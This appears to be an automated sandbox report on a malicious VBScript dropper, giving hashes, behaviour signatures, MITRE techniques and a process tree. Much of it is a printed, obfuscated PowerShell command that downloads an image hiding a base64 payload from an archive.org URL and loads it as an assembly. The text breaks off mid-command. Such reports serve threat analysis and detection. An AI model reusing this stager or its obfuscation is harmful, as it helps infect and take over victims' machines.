5e8cf043fa42fd8892c72fbdbf02c1023b1379322be23c213cfba5b8ae196f33

General

Target

sweetchcobarmilkbunwithgreatsweet.vbs
Size

184KB
MD5

09c311fde82907d15d6c211cba5102fe
SHA1

878ac6d6e1161babad2a8cf5fcec2361ff4936dd
SHA256

5e8cf043fa42fd8892c72fbdbf02c1023b1379322be23c213cfba5b8ae196f33
SHA512

758ed3c2cf758604e34ca0fe6c96f396e76728893377e983a07eca19838634954a0c70216e7416107e45404c9340498689d1363b08f4c2ac12c668dfb04185d5
SSDEEP

3072:DEx+vVuJ/1T6BxNyYI1gt5pXGw6IzS71lUOceP9LVGbGu:A4tuR1Tax/IPUde9RMB

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2288	powershell.exe
6	2288	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2580	powershell.exe
2288	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2580	powershell.exe
2288	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 2580	1976	WScript.exe	30
PID 1976 wrote to memory of 2580	1976	WScript.exe	30
PID 1976 wrote to memory of 2580	1976	WScript.exe	30
PID 2580 wrote to memory of 2288	2580	powershell.exe	32
PID 2580 wrote to memory of 2288	2580	powershell.exe	32
PID 2580 wrote to memory of 2288	2580	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sweetchcobarmilkbunwithgreatsweet.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍VQBy㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍JwBo㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bw㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍Og㉯ ⫏ ㇀〷 ⇍v㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍aQBh㉯ ⫏ ㇀〷 ⇍Dg㉯ ⫏ ㇀〷 ⇍M㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍z㉯ ⫏ ㇀〷 ⇍DE㉯ ⫏ ㇀〷 ⇍M㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍dQBz㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍YQBy㉯ ⫏ ㇀〷 ⇍GM㉯ ⫏ ㇀〷 ⇍a㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍HY㉯ ⫏ ㇀〷 ⇍ZQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍G8㉯ ⫏ ㇀〷 ⇍cgBn㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍Mg㉯ ⫏ ㇀〷 ⇍3㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍aQB0㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQBz㉯ ⫏ ㇀〷 ⇍C8㉯ ⫏ ㇀〷 ⇍dgBi㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍Xw㉯ ⫏ ㇀〷 ⇍y㉯ ⫏ ㇀〷 ⇍D㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍Mg㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍D㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍Nw㉯ ⫏ ㇀〷 ⇍y㉯ ⫏ ㇀〷 ⇍DY㉯ ⫏ ㇀〷 ⇍Xw㉯ ⫏ ㇀〷 ⇍y㉯ ⫏ ㇀〷 ⇍D㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍Mg㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍D㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍Nw㉯ ⫏ ㇀〷 ⇍y㉯ ⫏ ㇀〷 ⇍DY㉯ ⫏ ㇀〷 ⇍LwB2㉯ ⫏ ㇀〷 ⇍GI㉯ ⫏ ㇀〷 ⇍cw㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Go㉯ ⫏ ㇀〷 ⇍c㉯ ⫏ ㇀〷 ⇍Bn㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍Hc㉯ ⫏ ㇀〷 ⇍ZQBi㉯ ⫏ ㇀〷 ⇍EM㉯ ⫏ ㇀〷 ⇍b㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bgB0㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍PQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍E4㉯ ⫏ ㇀〷 ⇍ZQB3㉯ ⫏ ㇀〷 ⇍C0㉯ ⫏ ㇀〷 ⇍TwBi㉯ ⫏ ㇀〷 ⇍Go㉯ ⫏ ㇀〷 ⇍ZQBj㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍BT㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍E4㉯ ⫏ ㇀〷 ⇍ZQB0㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍VwBl㉯ ⫏ ㇀〷 ⇍GI㉯ ⫏ ㇀〷 ⇍QwBs㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍ZQBu㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍ZQBC㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍B3㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍YgBD㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍aQBl㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍EQ㉯ ⫏ ㇀〷 ⇍bwB3㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍b㉯ ⫏ ㇀〷 ⇍Bv㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍BE㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍Cg㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍VQBy㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍KQ㉯ ⫏ ㇀〷 ⇍7㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍aQBt㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍ZwBl㉯ ⫏ ㇀〷 ⇍FQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍WwBT㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍FQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍LgBF㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍YwBv㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍aQBu㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍XQ㉯ ⫏ ㇀〷 ⇍6㉯ ⫏ ㇀〷 ⇍Do㉯ ⫏ ㇀〷 ⇍VQBU㉯ ⫏ ㇀〷 ⇍EY㉯ ⫏ ㇀〷 ⇍O㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Ec㉯ ⫏ ㇀〷 ⇍ZQB0㉯ ⫏ ㇀〷 ⇍FM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍By㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍bgBn㉯ ⫏ ㇀〷 ⇍Cg㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍QgB5㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍ZQBz㉯ ⫏ ㇀〷 ⇍Ck㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BG㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍PQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍P㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍8㉯ ⫏ ㇀〷 ⇍EI㉯ ⫏ ㇀〷 ⇍QQBT㉯ ⫏ ㇀〷 ⇍EU㉯ ⫏ ㇀〷 ⇍Ng㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍F8㉯ ⫏ ㇀〷 ⇍UwBU㉯ ⫏ ㇀〷 ⇍EE㉯ ⫏ ㇀〷 ⇍UgBU㉯ ⫏ ㇀〷 ⇍D4㉯ ⫏ ㇀〷 ⇍Pg㉯ ⫏ ㇀〷 ⇍n㉯ ⫏ ㇀〷 ⇍Ds㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍BG㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍PQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍P㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍8㉯ ⫏ ㇀〷 ⇍EI㉯ ⫏ ㇀〷 ⇍QQBT㉯ ⫏ ㇀〷 ⇍EU㉯ ⫏ ㇀〷 ⇍Ng㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍F8㉯ ⫏ ㇀〷 ⇍RQBO㉯ ⫏ ㇀〷 ⇍EQ㉯ ⫏ ㇀〷 ⇍Pg㉯ ⫏ ㇀〷 ⇍+㉯ ⫏ ㇀〷 ⇍Cc㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BJ㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍Hg㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bp㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍V㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍Hg㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍Ek㉯ ⫏ ㇀〷 ⇍bgBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍e㉯ ⫏ ㇀〷 ⇍BP㉯ ⫏ ㇀〷 ⇍GY㉯ ⫏ ㇀〷 ⇍K㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BG㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍Ck㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bgBk㉯ ⫏ ㇀〷 ⇍Ek㉯ ⫏ ㇀〷 ⇍bgBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍e㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍D0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍ZQBU㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍e㉯ ⫏ ㇀〷 ⇍B0㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍SQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍E8㉯ ⫏ ㇀〷 ⇍Zg㉯ ⫏ ㇀〷 ⇍o㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍ZQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍RgBs㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍Zw㉯ ⫏ ㇀〷 ⇍p㉯ ⫏ ㇀〷 ⇍Ds㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bz㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍YQBy㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍SQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍LQBn㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍w㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍LQBh㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍ZQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍SQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍LQBn㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BJ㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍Hg㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BJ㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍Hg㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍r㉯ ⫏ ㇀〷 ⇍D0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BG㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍YQBn㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍T㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍ZwB0㉯ ⫏ ㇀〷 ⇍Gg㉯ ⫏ ㇀〷 ⇍Ow㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍GI㉯ ⫏ ㇀〷 ⇍YQBz㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍Ng㉯ ⫏ ㇀〷 ⇍0㉯ ⫏ ㇀〷 ⇍Ew㉯ ⫏ ㇀〷 ⇍ZQBu㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bo㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍PQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍ZQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍SQBu㉯ ⫏ ㇀〷 ⇍GQ㉯ ⫏ ㇀〷 ⇍ZQB4㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍LQ㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍cgB0㉯ ⫏ ㇀〷 ⇍Ek㉯ ⫏ ㇀〷 ⇍bgBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍e㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍7㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍YgBh㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍ZQ㉯ ⫏ ㇀〷 ⇍2㉯ ⫏ ㇀〷 ⇍DQ㉯ ⫏ ㇀〷 ⇍QwBv㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍D0㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍Gk㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍ZQBU㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍e㉯ ⫏ ㇀〷 ⇍B0㉯ ⫏ ㇀〷 ⇍C4㉯ ⫏ ㇀〷 ⇍UwB1㉯ ⫏ ㇀〷 ⇍GI㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍aQBu㉯ ⫏ ㇀〷 ⇍Gc㉯ ⫏ ㇀〷 ⇍K㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍k㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bh㉯ ⫏ ㇀〷 ⇍HI㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍BJ㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍Hg㉯ ⫏ ㇀〷 ⇍L㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍g㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍YgBh㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍ZQ㉯ ⫏ ㇀〷 ⇍2㉯ ⫏ ㇀〷 ⇍DQ㉯ ⫏ ㇀〷 ⇍T㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍ZwB0㉯ ⫏ ㇀〷 ⇍Gg㉯ ⫏ ㇀〷 ⇍KQ㉯ ⫏ ㇀〷 ⇍7㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍YwBv㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍BC㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍d㉯ ⫏ ㇀〷 ⇍Bl㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍WwBT㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍EM㉯ ⫏ ㇀〷 ⇍bwBu㉯ ⫏ ㇀〷 ⇍HY㉯ ⫏ ㇀〷 ⇍ZQBy㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍XQ㉯ ⫏ ㇀〷 ⇍6㉯ ⫏ ㇀〷 ⇍Do㉯ ⫏ ㇀〷 ⇍RgBy㉯ ⫏ ㇀〷 ⇍G8㉯ ⫏ ㇀〷 ⇍bQBC㉯ ⫏ ㇀〷 ⇍GE㉯ ⫏ ㇀〷 ⇍cwBl㉯ ⫏ ㇀〷 ⇍DY㉯ ⫏ ㇀〷 ⇍N㉯ ⫏ ㇀〷 ⇍BT㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍cgBp㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Zw㉯ ⫏ ㇀〷 ⇍o㉯ ⫏ ㇀〷 ⇍CQ㉯ ⫏ ㇀〷 ⇍YgBh㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍ZQ㉯ ⫏ ㇀〷 ⇍2㉯ ⫏ ㇀〷 ⇍DQ㉯ ⫏ ㇀〷 ⇍QwBv㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍bQBh㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍p㉯ ⫏ ㇀〷 ⇍Ds㉯ ⫏ ㇀〷 ⇍J㉯ ⫏ ㇀〷 ⇍Bs㉯ ⫏ ㇀〷 ⇍G8㉯ ⫏ ㇀〷 ⇍YQBk㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍Z㉯ ⫏ ㇀〷 ⇍BB㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍cwBl㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 ⇍YgBs㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍I㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍9㉯ ⫏ ㇀〷 ⇍C㉯ ⫏ ㇀〷 ⇍㉯ ⫏ ㇀〷 ⇍WwBT㉯ ⫏ ㇀〷 ⇍Hk㉯ ⫏ ㇀〷 ⇍cwB0㉯ ⫏ ㇀〷 ⇍GU㉯ ⫏ ㇀〷 ⇍bQ㉯ ⫏ ㇀〷 ⇍u㉯ ⫏ ㇀〷 ⇍FI㉯ ⫏ ㇀〷 ⇍ZQBm㉯ ⫏ ㇀〷 ⇍Gw㉯ ⫏ ㇀〷 ⇍ZQBj㉯ ⫏ ㇀〷 ⇍HQ㉯ ⫏ ㇀〷 ⇍aQBv㉯ ⫏ ㇀〷 ⇍G4㉯ ⫏ ㇀〷 ⇍LgBB㉯ ⫏ ㇀〷 ⇍HM㉯ ⫏ ㇀〷 ⇍cwBl㉯ ⫏ ㇀〷 ⇍G0㉯ ⫏ ㇀〷 